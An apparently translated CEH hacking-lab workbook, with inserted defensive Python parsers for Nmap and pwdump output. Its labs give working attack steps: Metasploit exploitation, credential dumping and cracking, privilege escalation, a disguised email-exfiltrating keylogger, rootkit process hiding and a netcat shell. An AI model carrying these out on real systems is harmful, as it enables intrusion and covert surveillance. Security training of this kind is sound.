VanLuong.blogspot.com CEH


7/28/2019 VanLuong.blogspot.com CEH

C|EH Exercise Workbook. Material for students.

VSIC Education Corporation Page 1

Table of Contents

Lesson 1: FOOTPRINTING ..... 3
  I/ Introduction to Footprinting ..... 3
  II/ Exercises ..... 3
    Exercise 1: Finding information about a domain ..... 3
    Exercise 2: Finding email information ..... 5
Lesson 2: SCANNING ..... 7
  I/ Introduction to Scanning ..... 7
  II/ Exercises ..... 7
    Exercise 1: Using the Nmap program ..... 7
    Exercise 2: Using the Retina program to detect vulnerabilities and attacking with the Metasploit framework ..... 13
Lesson 3: SYSTEM HACKING ..... 18
  I/ Introduction to System Hacking ..... 18
  II/ Labs ..... 18
    Exercise 1: Cracking local passwords ..... 18
    Exercise 2: Using the pwdump3v2 program, once one administrator user of the victim machine is obtained, to find information about the remaining users ..... 20
    Lab 3: Privilege escalation through the Kaspersky Lab program ..... 23
    Lab 4: Using a keylogger ..... 25
    Lab 5: Using a Rootkit and deleting log files ..... 27
Lesson 4: TROJANS and BACKDOORS ..... 30
  I/ Introduction to Trojans and Backdoors ..... 30
  II/ Exercises ..... 30
    Exercise 1: Using netcat ..... 30
    Exercise 2: Using the Beast Trojan and detecting the trojan ..... 32
      To use the Beast Trojan, we need to build a Server file and install it on the victim machine; this server file then listens on fixed ports, and from the attacking machine we connect to the victim machine through that port ..... 32
    Exercise 3: Using a web-based Trojan ..... 35
Lesson 5: SNIFFER METHODS ..... 38
  I/ Introduction to Sniffers ..... 38
Lesson 6: Denial of Service (DoS) attacks ..... 65
  I/ Introduction ..... 65
  II/ Lab description ..... 67
    Lab 1: DoS using Ping of Death ..... 67
    Lab 2: DoS against a protocol that does not use authentication (the lab uses RIP) ..... 69
    Lab 3: Using flash DDoS ..... 72
Lesson 7: Social Engineering ..... 74
  I/ Introduction ..... 74
  II/ Labs ..... 74
    Lab 1: Sending an anonymous email with an attached Trojan ..... 74
Lesson 8: Session Hijacking ..... 77
  I/ Introduction ..... 77
  II/ Performing the lab ..... 77
Lesson 9: Hacking Web Servers ..... 80
  I/ Introduction ..... 80
  II/ Performing the lab ..... 80
    Lab 1: Attacking a Win 2003 web server (Apache bug) ..... 80
    Lab 2: Exploiting a bug in the Server U application ..... 84
Lesson 10: WEB APPLICATION HACKING ..... 85
  I/ Introduction ..... 85
  II/ Labs ..... 85
    Lab 1: Cross Site Scripting ..... 85
    Lab 2: Insufficient Data Validation ..... 86
    Lab 3: Cookie Manipulation ..... 88
    Lab 4: Authorization Failure ..... 89
Lesson 11: SQL INJECTION ..... 91
  I/ Introduction to SQL Injection ..... 91
  II/ Performing the lab ..... 94
Lesson 12: WIRELESS HACKING ..... 101
  I/ Introduction ..... 101
  II/ Performing the lab ..... 101
Lesson 13: VIRUSES ..... 105
  I/ Introduction (see the supplementary reading) ..... 105
  II/ Lab ..... 105
    Exercise 1: A virus that destroys data on the machine ..... 105
    Exercise 2: The gaixinh virus spreading via instant messages ..... 107
Lesson 14: BUFFER OVERFLOW ..... 111
  I/ Theory ..... 111
  II/ Practice ..... 118


Registrar Name....: BlueHost.Com
Registrar Whois...: whois.bluehost.com
Registrar Homepage: http://www.bluehost.com/

Domain Name: ITVIETNAM.COM
Created on..............: 1999-11-23 11:31:30 GMT
Expires on..............: 2009-11-23 00:00:00 GMT
Last modified on........: 2007-07-30 03:15:11 GMT

Registrant Info: (FAST-12836461)
VSIC Education Corporation
VSIC Education Corporation
78-80 Nguyen Trai Street,
5 District, HCM City, 70000
Vietnam
Phone: +84.88363691
Fax..:
Email: [email protected]
Last modified: 2007-03-23 04:12:24 GMT

Administrative Info: (FAST-12836461)
VSIC Education Corporation
VSIC Education Corporation
78-80 Nguyen Trai Street,
5 District, HCM City, 70000
Vietnam
Phone: +84.88363691
Fax..:
Email: [email protected]
Last modified: 2007-03-23 04:12:24 GMT

Technical Info: (FAST-12785240)
Attn: itvietnam.com
C/O BlueHost.Com Domain Privacy
1215 North Research Way Suite #Q 3500
Orem, Utah 84097
United States
Phone: +1.8017659400
Fax..: +1.8017651992
Email: [email protected]
Last modified: 2007-04-05 16:50:56 GMT

Status: Locked

Besides finding information about the domain as above, we can use Reverse IP domain lookup utilities to see how many other hosts share our IP address. Go to the following link to use this utility: http://www.domaintools.com/reverse-ip/

Finding this information is very useful for a hacker: knowing that the server is shared, the hacker can go through the vulnerable websites in that list, attack the server, and from there control every website hosted on it.

Exercise 2: Finding email information

In this exercise we use the program 1st email address spider to search for information about email addresses. A hacker can use this program to gather more information about mail, or to filter out different groups of email addresses; you can, however, also use this tool to gather information for marketing purposes, for example when you need to find email addresses ending in @vnn.vn or @hcm.vnn.vn to market a product.

We can configure which website is used to collect the information; in this exercise I use google.com for the search.

Then type the keyword vnn.vn into the keyword field.

After that, using this program, we obtain a list of mail addresses like the following.

Lesson 2:

SCANNING

I/ Introduction to Scanning:

Scanning, also called network scanning, is an indispensable step in a hacker's attack on a network. If this step is done well, the hacker will quickly discover flaws in the system, for example the RPC bug in Windows or bugs in web service software such as Apache. From these flaws the hacker can use malicious code (taken from websites) to attack the system, in the worst case obtaining a shell.

There are many kinds of scanning software, including commercial products such as Retina and GFI, and free ones such as Nmap and Nessus. Commercial editions can usually update their list of new bugs from the Internet and can therefore detect newer flaws. Scanning software can help administrators find the flaws in their systems and, at the same time, suggest fixes such as installing a service patch or applying more sensible policies.

II/ Exercises

Exercise 1: Using the Nmap program

Before doing this exercise, students should review the theory material on the options of nmap.

We can use the program on the CEH v5 CD, or download the latest version from the website www.insecure.org. Nmap has two editions, one for Windows and one for Linux; in the Nmap exercise we use the Windows edition.

To do this exercise, students should use VMware and boot several different operating systems such as Win XP SP2, Win 2003 SP1, Linux Fedora Core, Win 2000 SP4, etc.

First we use Nmap to probe which hosts in the subnet are up and which ports those hosts have open. We run nmap -h to review Nmap's options, then run nmap -sS 10.100.100.1-20, which gives the following result:

C:\Documents and Settings\anhhao>nmap -sS 10.100.100.1-20

Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:27 Pacific Standard Time
Interesting ports on 10.100.100.1:
Not shown: 1695 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
111/tcp open  rpcbind
MAC Address: 00:0C:29:09:ED:10 (VMware)

Interesting ports on 10.100.100.6:
Not shown: 1678 closed ports
PORT     STATE SERVICE
7/tcp    open  echo
9/tcp    open  discard
13/tcp   open  daytime
17/tcp   open  qotd
19/tcp   open  chargen
23/tcp   open  telnet
42/tcp   open  nameserver
53/tcp   open  domain
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
1027/tcp open  IIS
1030/tcp open  iad1
2105/tcp open  eklogin
3389/tcp open  ms-term-serv
8080/tcp open  http-proxy
MAC Address: 00:0C:29:59:97:A2 (VMware)

Interesting ports on 10.100.100.7:
Not shown: 1693 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
MAC Address: 00:0C:29:95:A9:03 (VMware)

Interesting ports on 10.100.100.11:
Not shown: 1695 filtered ports
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:A6:2E:31 (VMware)

Skipping SYN Stealth Scan against 10.100.100.13 because Windows does not support
scanning your own machine (localhost) this way.
All 0 scanned ports on 10.100.100.13 are

Interesting ports on 10.100.100.16:
Not shown: 1689 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
25/tcp   open  smtp
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
1433/tcp open  ms-sql-s
MAC Address: 00:0C:29:D6:73:6D (VMware)

Interesting ports on 10.100.100.20:
Not shown: 1693 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
445/tcp  open  microsoft-ds
1000/tcp open  cadlock
5101/tcp open  admdog
MAC Address: 00:15:C5:65:E3:85 (Dell)

Nmap finished: 20 IP addresses (7 hosts up) scanned in 21.515 seconds

There are 7 hosts in the network in total: 6 VMware machines and 1 Dell PC. The next step is to look for information about the OS of these hosts using the command nmap -v -O <ip address>.

C:\Documents and Settings\anhhao>nmap -vv -O 10.100.100.7   (view the details of the Nmap scan)

Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:46 Pacific Standard Time
Initiating ARP Ping Scan at 10:46
Scanning 10.100.100.7 [1 port]
Completed ARP Ping Scan at 10:46, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:46
Completed Parallel DNS resolution of 1 host. at 10:46, 0.01s elapsed
Initiating SYN Stealth Scan at 10:46
Scanning 10.100.100.7 [1697 ports]
Discovered open port 1025/tcp on 10.100.100.7
Discovered open port 445/tcp on 10.100.100.7
Discovered open port 135/tcp on 10.100.100.7
Discovered open port 139/tcp on 10.100.100.7
Completed SYN Stealth Scan at 10:46, 1.56s elapsed (1697 total ports)
Initiating OS detection (try #1) against 10.100.100.7
Host 10.100.100.7 appears to be up ... good.
Interesting ports on 10.100.100.7:
Not shown: 1693 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
MAC Address: 00:0C:29:95:A9:03 (VMware)
Device type: general purpose
Running: Microsoft Windows 2003
OS details: Microsoft Windows 2003 Server SP1

OS Fingerprint:

Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IPID Sequence Generation: Incremental
OS detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
Nmap finished: 1 IP address (1 host up) scanned in 3.204 seconds
Raw packets sent: 1767 (78.460KB) | Rcvd: 1714 (79.328KB)

You can view the fingerprints in C:\Program Files\Nmap\nmap-os-fingerprints

Continue with the remaining machines.

C:\Documents and Settings\anhhao>nmap -O 10.100.100.1

Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:54 Pacific Standard Time
Interesting ports on 10.100.100.1:
Not shown: 1695 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
111/tcp open  rpcbind
MAC Address: 00:0C:29:09:ED:10 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.12 (x86)
Uptime: 0.056 days (since Thu Aug 02 09:34:08 2007)
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
Nmap finished: 1 IP address (1 host up) scanned in 2.781 seconds

However, there are some hosts that Nmap cannot identify, as follows:

C:\Documents and Settings\anhhao>nmap -O 10.100.100.16

Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:55 Pacific Standard Time
Interesting ports on 10.100.100.16:
Not shown: 1689 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
25/tcp   open  smtp
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
1433/tcp open  ms-sql-s
MAC Address: 00:0C:29:D6:73:6D (VMware)
No exact OS matches for host (If you know what OS is running on it, see http://insecure.org/nmap/submit/ ).
TCP/IP fingerprint:


Network Distance: 1 hop
OS detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
Nmap finished: 1 IP address (1 host up) scanned in 12.485 seconds

However, we can tell that this is a server running an SQL service and a web server, so we now use the command nmap -p 80 -sV 10.100.100.16 to determine the version of IIS.

C:\Documents and Settings\anhhao>nmap -p 80 -sV 10.100.100.16

Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 11:01 Pacific Standard Time
Interesting ports on 10.100.100.16:
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS webserver 5.0
MAC Address: 00:0C:29:D6:73:6D (VMware)
Service Info: OS: Windows
Service detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
Nmap finished: 1 IP address (1 host up) scanned in 6.750 seconds

So we can guess that most of the hosts are Windows 2000 Server. Besides the exercise above, we can also use Nmap to trace, save logs, etc.
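Added example, not part of the lab manual: a small Python parser for Nmap's normal output in the format shown above, turning it into a per-host inventory and flagging the open services an administrator would review after such a scan. The embedded sample output is constructed in the shape of the lab's runs; its hosts, MACs and OS lines are made up.

```python
"""Parse Nmap 4.x normal output (the format shown in the lab above) into a
per-host inventory and flag exposed services a defender should review.

Added example, not part of the VSIC lab manual.  The sample output below is
constructed in the shape of the lab's `nmap -sS` / `nmap -O` runs; the hosts,
MACs and OS lines are made up.
"""
import re

SAMPLE = """\
Starting Nmap 4.20 ( http://insecure.org ) at 2007-08-02 10:27 Pacific Standard Time
Interesting ports on 10.100.100.6:
Not shown: 1678 closed ports
PORT     STATE SERVICE
7/tcp    open  echo
19/tcp   open  chargen
23/tcp   open  telnet
135/tcp  open  msrpc
445/tcp  open  microsoft-ds
3389/tcp open  ms-term-serv
MAC Address: 00:0C:29:59:97:A2 (VMware)
Interesting ports on 10.100.100.16:
Not shown: 1689 closed ports
PORT     STATE SERVICE
80/tcp   open  http
1433/tcp open  ms-sql-s
MAC Address: 00:0C:29:D6:73:6D (VMware)
Device type: general purpose
Running: Microsoft Windows 2003
OS details: Microsoft Windows 2003 Server SP1
Nmap finished: 20 IP addresses (2 hosts up) scanned in 21.515 seconds
"""

HOST_RE = re.compile(r"^Interesting ports on (\S+):")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")
MAC_RE = re.compile(r"^MAC Address: (\S+) \((.*)\)")
OS_RE = re.compile(r"^OS details: (.*)")

# Services the lab's scans and Retina report surfaced that should not be
# reachable on a server network without a deliberate decision.
REVIEW = {
    "echo": "legacy TCP small service, disable it",
    "chargen": "amplification/DoS vector, disable it",
    "telnet": "cleartext logins, replace with SSH",
    "msrpc": "RPC/DCOM endpoint exposed, restrict with the host firewall",
    "microsoft-ds": "SMB exposed, restrict with the host firewall",
    "ms-sql-s": "database listener reachable, limit to the application tier",
}


def parse_nmap(text):
    """Return {ip: {"ports": [(port, proto, state, service)], "mac", "vendor", "os"}}.

    Lines before the first 'Interesting ports on' header (the banner) are
    ignored; every later line is attributed to the most recent host header.
    """
    hosts = {}
    current = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = hosts.setdefault(
                m.group(1), {"ports": [], "mac": None, "vendor": None, "os": None})
            continue
        if current is None:
            continue
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service = m.groups()
            current["ports"].append((int(port), proto, state, service))
            continue
        m = MAC_RE.match(line)
        if m:
            current["mac"], current["vendor"] = m.group(1), m.group(2)
            continue
        m = OS_RE.match(line)
        if m:
            current["os"] = m.group(1)
    return hosts


def review_findings(hosts):
    """Return a sorted list of (ip, port, service, reason) for open services in REVIEW."""
    findings = []
    for ip, info in hosts.items():
        for port, _proto, state, service in info["ports"]:
            if state == "open" and service in REVIEW:
                findings.append((ip, port, service, REVIEW[service]))
    return sorted(findings)


if __name__ == "__main__":
    inventory = parse_nmap(SAMPLE)
    for ip, info in inventory.items():
        print(ip, info["os"] or "OS unknown", info["vendor"] or "",
              len(info["ports"]), "open ports")
    for ip, port, service, reason in review_findings(inventory):
        print("REVIEW %s:%d %s: %s" % (ip, port, service, reason))
```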

Exercise 2: Using the Retina program to detect vulnerabilities and attacking with the Metasploit framework.

Retina from eEye is a commercial program (as are GFI, Shadow, etc.) that can update its vulnerability list regularly and helps system administrators come up with remediation measures. We now use Retina to find the flaws of the Win 2003 SP0 machine (10.100.100.6).

Report from the Retina program:

TOP 20 VULNERABILITIES

The following is an overview of the top 20 vulnerabilities on your network.

Rank  Vulnerability Name  Count
1.  echo service  1
2.  ASN.1 Vulnerability Could Allow Code Execution  1
3.  Windows Cumulative Patch 835732 Remote  1
4.  Null Session  1
5.  No Remote Registry Access Available  1
6.  telnet service  1
7.  DCOM Enabled  1
8.  Windows RPC Cumulative Patch 828741 Remote  1
9.  Windows RPC DCOM interface buffer overflow  1
10. Windows RPC DCOM multiple vulnerabilities  1
11. Apache 1.3.27 0x1A Character Logging DoS  1
12. Apache 1.3.27 HTDigest Command Execution  1
13. Apache mod_alias and mod_rewrite Buffer Overflow  1
14. ApacheBench multiple buffer overflows  1
15. HTTP TRACE method supported  1

TOP 20 OPEN PORTS

The following is an overview of the top 20 open ports on your network.

Rank  Port Number  Description  Count
1.  TCP:7  ECHO - Echo  1
2.  TCP:9  DISCARD - Discard  1
3.  TCP:13  DAYTIME - Daytime  1
4.  TCP:17  QOTD - Quote of the Day  1
5.  TCP:19  CHARGEN - Character Generator  1
6.  TCP:23  TELNET - Telnet  1
7.  TCP:42  NAMESERVER / WINS - Host Name Server  1
8.  TCP:53  DOMAIN - Domain Name Server  1
9.  TCP:80  WWW-HTTP - World Wide Web HTTP (Hyper Text Transfer Protocol)  1
10. TCP:135  RPC-LOCATOR - RPC (Remote Procedure Call) Location Service  1
11. TCP:139  NETBIOS-SSN - NETBIOS Session Service  1
12. TCP:445  MICROSOFT-DS - Microsoft-DS  1
13. TCP:1025  LISTEN - listen  1
14. TCP:1026  NTERM - nterm  1
15. TCP:1030  IAD1 - BBN IAD  1
16. TCP:2103  ZEPHYR-CLT - Zephyr Serv-HM Conncetion  1
17. TCP:2105  EKLOGIN - Kerberos (v4) Encrypted RLogin  1
18. TCP:3389  MS RDP (Remote Desktop Protocol) / Terminal Services  1
19. TCP:8080  Generic - Shared service port  1
20. UDP:7  ECHO - Echo  1

TOP 20 OPERATING SYSTEMS

The following is an overview of the top 20 operating systems on your network.

Rank  Operating System Name  Count
1.  Windows Server 2003  1

Thus we have determined the operating system of 10.100.100.6, the open ports of the system, and the system's flaws. This is the information an administrator needs to identify and patch flaws. From the Top 20 vulnerabilities we will exploit bug number 10, RPC DCOM, with the Metasploit framework (CEH v5 CD). We can check the details of this flaw on eEye's own site, or on securityfocus.com and microsoft.com.

We use Metasploit's console interface to find the bug matching what Retina has just scanned.


We can see that the exploit msrpc_dcom_ms03_026.pm is listed in Metasploit's exploit section. Now we begin exploiting this flaw.

After the exploit we have a shell on the Win 2003 machine; we can now upload a backdoor or take the information we need from this machine (this will be discussed in later chapters).

Conclusion: Scanning software is very important for a hacker to discover system flaws; once a flaw is identified, the hacker can use a ready-made framework or code available on the Internet to take control of the target machine. However, it is also a useful tool for the system administrator: it helps the administrator reassess the security level of their own systems and continuously check for bugs as they appear.


Lesson 3:

SYSTEM HACKING

I/ Introduction to System Hacking:

As we learned in the theory part, the System Hacking module covers techniques for obtaining usernames and passwords, escalating privileges on the system, using a keylogger to gather information about the target (at this step the hacker may also plant a Trojan, which is covered in the next chapter), hiding information about running processes (Rootkit), and deleting system logs.

For obtaining local usernames and passwords, the hacker can crack the passwords on the local machine if software is installed on it, or use a Knoppix boot CD to obtain the syskey; the next step is to decrypt the SAM to obtain the hashes of the system accounts. We can also obtain usernames and passwords remotely via SMB or NTLM (using the sniffing technique taught in a later chapter), or through a known account on the system (using PWdump3).

For privilege escalation, the hacker can use vulnerabilities in Windows or in software running on the system to obtain Admin rights and control the system. In the exercise we exploit a vulnerability in Kaspersky Lab 6.0 to escalate from an ordinary user to the Administrator user on Win XP SP2.

For the keylogger part we use SC-keylogger to observe the victim's activity, such as monitoring keystrokes, chat information, machine usage, and the user accounts in use.

Next we use a Rootkit to hide the keylogger's processes so that the system administrator cannot discover that they are being monitored. At this step we use the Vanquish rootkit to hide processes in the system. Finally we delete the logs and the traces of the intrusion.

II/ Labs

Exercise 1: Cracking local passwords


First we install the Cain program on the target machine and use it to find the users' passwords.

The Add user process

Start Cain and choose Import Hashes from local system.

Here we see three modes. Import Hashes from local system uses the SAM file of the current system to obtain the account hashes (not encrypted with the syskey). The option Import Hashes from text file normally takes a text file produced by Pwdump (which stores the system account hashes in unencrypted form). The third option is for when we have the syskey and a SAM file encrypted with the syskey. In all three cases, if the information is entered in full, we obtain account hashes that are not encrypted with the syskey. Using these hashes the program brute-forces the accounts' passwords.

In this exercise we choose the user haovsic and choose Brute force on the NTLM hash. After choosing this mode we see the PC start computing and produce the result.


Exercise 2: Using the pwdump3v2 program, once one administrator user of the victim machine is obtained, to find information about the remaining users.


The victim machine runs Windows 2003 SP0 and has an existing user quyen with the password cisco; based on this account, we can now find more information about the other accounts on the machine.

First we run pwdump3.exe to see the parameters it requires. Then we run pwdump3.exe 10.100.100.6 c:\hao2003sp0 quyen and enter the password of the user quyen.

We open the file hao2003sp0 to view the information inside.

Note that user quyen has RID 500, which is the RID of the built-in administrator account on the machine, and Guest has RID 501. Besides that, we now hold each user's password hashes; next we use Cain to recover the other users' passwords.

A Brute Force Attack on the user hicehclass recovers the password 1234a. This password has only five characters and is cracked easily; a strong password (a mix of upper- and lower-case letters, digits and special characters) takes far longer.
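The dump above is the pwdump format, user:RID:LM hash:NT hash:::. The following Python, added here as an example and not part of the manual or of Cain/pwdump, parses that format, flags what a reviewer should notice before cracking (RID 500, empty passwords, LM hashes whose second half is the well-known empty block AAD3B435B51404EE, meaning a password of 7 characters or fewer, and users sharing a hash and therefore a password), and implements the NT hash (MD4 over the UTF-16LE password) so a small dictionary attack can be checked offline. The sample lines are taken from the dump above except the labuser line, which is constructed with the NT hash of "password"; the MD4 routine is written out because hashlib's md4 is missing from many OpenSSL builds.

```python
"""Parse pwdump-style output and check it for weak-password indicators.

Added example, not from the original lab manual. MD4 is implemented here
because hashlib.new('md4') is unavailable on many modern Python builds.
"""
import struct

# LM hash half computed over an empty 7-byte block: an LM hash ending with it
# means the password has at most 7 characters.
EMPTY_LM_HALF = "AAD3B435B51404EE"
EMPTY_NT_HASH = "31D6CFE0D16AE931B73C59D7E0C089C0"   # NT hash of ""


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, the primitive behind the NT hash."""
    msg = data + b"\x80"
    ms, g_bits = msg, len(data) * 8
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", g_bits)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]

    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def hh(x, y, z): return x ^ y ^ z

    r2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):   # round 1
            a = _lrot((a + f(b, c, d) + x[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):   # round 2
            a = _lrot((a + g(b, c, d) + x[r2[i]] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):   # round 3
            a = _lrot((a + hh(b, c, d) + x[r3[i]] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        h = [(v + w) & 0xFFFFFFFF for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), upper-case hex as pwdump prints it."""
    return md4(password.encode("utf-16-le")).hex().upper()


def parse_pwdump(text: str):
    """Yield (user, rid, lm, nt) for every 'user:rid:lm:nt:::' line."""
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) >= 4 and parts[1].isdigit():
            yield parts[0], int(parts[1]), parts[2].upper(), parts[3].upper()


def audit(text: str):
    """Return {user: [findings]} for accounts worth a second look."""
    rows = list(parse_pwdump(text))
    by_nt = {}
    for user, _, _, nt in rows:
        by_nt.setdefault(nt, []).append(user)
    findings = {}
    for user, rid, lm, nt in rows:
        notes = []
        if rid == 500:
            notes.append("built-in Administrator (RID 500), even if renamed")
        if nt == EMPTY_NT_HASH or nt.startswith("NO PASSWORD"):
            notes.append("empty password")
        elif lm.endswith(EMPTY_LM_HALF) and not lm.startswith("NO PASSWORD"):
            notes.append("LM hash stored and password is 7 characters or fewer")
        elif not lm.startswith("NO PASSWORD"):
            notes.append("LM hash stored (case-insensitive, cracked as two 7-char halves)")
        if len(by_nt[nt]) > 1 and not nt.startswith("NO PASSWORD"):
            notes.append("same password as " + ", ".join(u for u in by_nt[nt] if u != user))
        if notes:
            findings[user] = notes
    return findings


def crack_nt(target_nt: str, wordlist):
    """Dictionary attack against one NT hash; returns the match or None."""
    target_nt = target_nt.upper()
    return next((w for w in wordlist if nt_hash(w) == target_nt), None)


# Lines from the dump in the text above; 'labuser' is constructed (NT hash of "password").
SAMPLE = """\
quyen:500:A00B9194BEDB81FEAAD3B435B51404EE:5C800F13A3CE86ED2540DD4E7331E9A2:::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::
anhhao:1010:DCAF9F8B002C73A0AAD3B435B51404EE:A923FFCC9BE38EBF40A5782BBD9D5E18:::
anhhao1:1011:DCAF9F8B002C73A0AAD3B435B51404EE:A923FFCC9BE38EBF40A5782BBD9D5E18:::
labuser:1030:NO PASSWORD*********************:8846F7EAEE8FB117AD06BDD830B7586C:::
"""

if __name__ == "__main__":
    for user, notes in audit(SAMPLE).items():
        print(user, "->", "; ".join(notes))
    print("labuser:", crack_nt("8846F7EAEE8FB117AD06BDD830B7586C", ["cisco", "1234a", "password"]))
```

The LM check is the cheap win: any LM hash not equal to the empty value is crackable half by half regardless of NT strength, so the first remediation is to disable LM hash storage rather than to argue about password length.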

Lab 3: Privilege escalation through the Kaspersky Lab product

To escalate privileges on a system the attacker must abuse some vulnerability, either in the operating system or in third-party software; in this case we escalate through the Kaspersky anti-virus product. To prepare the lab, look up the exploit code for this issue on www.milw0rm.com.

Compile that code into an exe file to attack the victim machine. To do the lab you need Kaspersky installed on the machine. After installing it, add an ordinary (non-administrator) user and log on as that user; in this exercise the user is hao with the password hao.


Run the compiled exe to exploit Kaspersky, which runs with system-level (administrator) rights.

Use telnet 127.0.0.1 8080 to reach the shell the exploit has opened with those rights. From there run net localgroup administrators hao /add to add user hao to the Administrators group, and net user hao to confirm:

    Microsoft Windows XP [Version 5.1.2600]

    (C) Copyright 1985-2001 Microsoft Corp.

    D:\WINDOWS\system32>

    D:\WINDOWS\system32>net Localgroup administrators hao /add

    net Localgroup administrators hao /add

    The command completed successfully.

    D:\WINDOWS\system32>net user hao

    net user hao

    User name hao

    Full Name

    Comment

    User's comment

    Country code 000 (System Default)

    Account active Yes

    Account expires Never

    Password last set 8/3/2007 1:47 PM

    Password expires 9/15/2007 12:35 PM

    Password changeable 8/3/2007 1:47 PM

    Password required Yes


    User may change password Yes

    Workstations allowed All

    Logon script

    User profile

Home directory

Last logon 8/3/2007 1:54 PM

    Logon hours allowed All

Local Group Memberships *Administrators *Users

Global Group memberships *None

    The command completed successfully.

    D:\WINDOWS\system32>

User hao now has Administrator rights on the system, so the privilege escalation succeeded. You can try similar programs built from code downloaded from www.milw0rm.com.

Lab 4: Using a keylogger

In this lab we use SC Keylogger to collect information from the victim's machine. The steps are to build the keylogger file, choose a mail relay server, and install it on the victim.

After installing the program that builds the keylogger file, configure your keylogger. First choose which actions are written to the log file: keyboard input, mouse activity, and the programs that are run.


Next enter the e-mail address to which the victim machine will send the log file. It is sent every 10 minutes.

Next configure the mail relay server and the process name that will be displayed. Here attackers usually pick names resembling services already present on Windows, such as svchost.exe or csrss.exe, to fool the administrator. To make it easy to recognise in this lab we name the file cehkeylogger.

With the keylogger built, run it on the victim machine. Pick some Windows XP machine to run the program on and suppose the user then types the following text:


After about 10 minutes the log file arrives, looking like this:

    >> C:\WINDOWS\system32\notepad.exe

    > Chuc lopSecCEH manh khoe, va nhieu thanh dat..

    > Chuc lop CEH hoc gioi>::::::::::

    > ms

    >

    C:\WINDOWS\system32\mspaint.exe

As seen above, the keylogger can record nearly everything done on the victim's PC, in particular sensitive data such as credit card numbers and account credentials.

The author asks you to use this knowledge for research only and not to use this program for malicious purposes.

Lab 5: Using a rootkit and clearing log files

A rootkit is a program that hides the activity of a keylogger or trojan, making it hard for the system administrator to detect them. In this exercise we use the FU rootkit to hide the process of the keylogger installed in the previous lab. First use the tasklist command to list the processes running on the machine.


As seen in the screenshot, the cehkeylogger.exe process has PID 1236. Hide this process with the command fu -ph 1236 and then list the processes again with tasklist.


The keylogger has vanished from tasklist. To detect it reliably at this point the administrator should rely on anti-virus software, access control, and dedicated rootkit detection tools run on the machine.


Lesson 4:

TROJANS AND BACKDOORS

I/ Introduction to trojans and backdoors:

Trojans and backdoors are used to monitor a victim's machine and serve as a back door through which the attacker can re-enter the system, either over a network port or through the web environment (web-based). Port-based ones commonly seen are netcat, Beast, Donald Dick and so on; web-based ones are typically r57, c99, zehir4 and the like. A port-based trojan must open a port for every connection, so it is comparatively easy for an administrator to detect, unlike the web-based kind (which usually targets web servers). In this lesson we try out the features of netcat, Beast, c99 and zehir4, and analyse a sample piece of trojan code.

II/ Exercises:

Exercise 1: Using netcat:

1/ Using netcat to connect to a shell

On the victim's machine, start netcat in listening mode: the -l (listen) option and -p port set the port number to listen on, and -e makes netcat execute a program when a connection arrives, usually the command shell cmd.exe (on NT) or /bin/sh (on Unix).

    E:\>nc -nvv -l -p 8080 -e cmd.exe

    listening on [any] 8080 ...

    connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159

    sent 0, rcvd 0: unknown socket error

- On the attacking machine, simply use netcat to connect to the victim on the chosen port, for example 8080:

    C:\>nc -nvv 172.16.84.2 8080

    (UNKNOWN) [172.16.84.2] 8080 (?) open

